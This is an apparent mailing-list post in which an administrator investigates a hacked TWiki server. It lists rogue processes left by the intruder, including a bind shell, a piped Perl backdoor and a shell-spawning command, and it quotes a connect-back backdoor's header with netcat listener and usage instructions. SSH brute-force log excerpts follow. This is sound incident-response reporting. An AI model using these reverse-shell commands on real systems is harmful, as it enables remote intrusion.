[Date Prev][Date Next] [Thread Prev][Thread Next] [Date Index] [Thread Index]

Re: Wiki hacked?

+++ Wookey [05-09-29 17:57 +0100]:
> +++ Wolfgang Denk [05-09-29 17:11 +0200]:
> And the reason there is no debian update for it is that the debian twiki
> package is not installed. Looks like whoever installed twiki put their own
> tarball in instead of the debian package. 
> That was a mistake - leaves you exposed to security flaws down the line...

OK - it looks like there isn't a twiki package in testing (which the server
is running), which is no doubt why we have a manual install. 

> I'll change over to the debian one ASAP. If anyone knows how to do that
> without losing the current content then do feel free to stick your oar in.

I've put in the twiki package from unstable but kept the machine pinned at

Found a bit more evidence of wrongdoing:
we have these rogue www-data processes:
22605 ./bind 1234
22905 sh -c /usr/bin/rlog  -rr1.37|perl /var/tmp/backup.pl 995
22907 lpd
22908 sh -c echo "uname -a";echo "id";/bin/sh
22913 /bin/sh
22924 ./stack
22925 ./stack
22926 ./stack

the last stack is using 99% CPU and has used 4365:59 system time
and /var/tmp/backup.pl is an exploit:
# Remote Connect-Back Backdoor Shell v1.0.
# (c)AresU 2004
# 1ndonesia Security Team (1st)
# AresU[at]bosen.net
# Usage:
# 1) Listen port to received shell prompt using NetCat on your toolbox, for
example: nc -l -p 9000
# 2) Remote Command Execution your BackDoor Shell, for example: perl
connect.pl <iptoolbox> <ncportlisten>
# --------
# The supplied exploit code is not to be used for malicious purpose, but for
educational purpose only. The Authors and 
#1ndonesian Security Team WILL NOT responsible for anything happened by the
couse of using all information on these website.
# ---------

It's pointing at what looks like malaysian server port 995,
which is pop3s.

I've killed those processes and moved the files. 

There are loads of messages like:
Sep 25 14:06:14 onz sshd[15369]: Illegal user chloe from
from sep 19th to today-  looks like brute-force attempt to login?
comes from servers: 21:46 to 22:01 on sep 19th  12:31 to 13:06 on sep 20th   13:Â34 to 13:43 on sep 20th 23:14 to 23:16 on sep 21st  11:40 to 12:26 on sep 22nd  at 18:06 on sep 22nd   20:30 to 20:49 on sep 22nd including a lot of messahes like 
 Sep 22 20:47:12 onz sshd[8760]: reverse mapping checking getaddrinfo for
luis.spu.edu.ph failed - POSSIBLE BREAKIN ATTEMPT!   14:42 to 15:04 on sep 23rd at 17:10 on sep 23rd
 and so on. 
The original www-data failed login came from
 Sep 19 20:12:46 onz sshd[27962]: (pam_unix) authentication failure;
logname= uid=0 euid=0 tty=ssh ruser= rhost=  us
Sep 19 20:12:48 onz sshd[27959]: error: PAM: Authentication failure for
www-data from
Sep 19 20:12:59 onz sshd[27959]: error: PAM: Authentication failure for
www-data from
Sep 19 20:13:04 onz sshd[27959]: error: PAM: Have exhasted maximum number of
retries for service. for www-data from

OK - that's enough for tonight

Aleph One Ltd, Bottisham, CAMBRIDGE, CB5 9BA, UK  Tel +44 (0) 1223 811679
work: http://www.aleph1.co.uk/     play: http://www.chaos.org.uk/~wookey/

Reply to: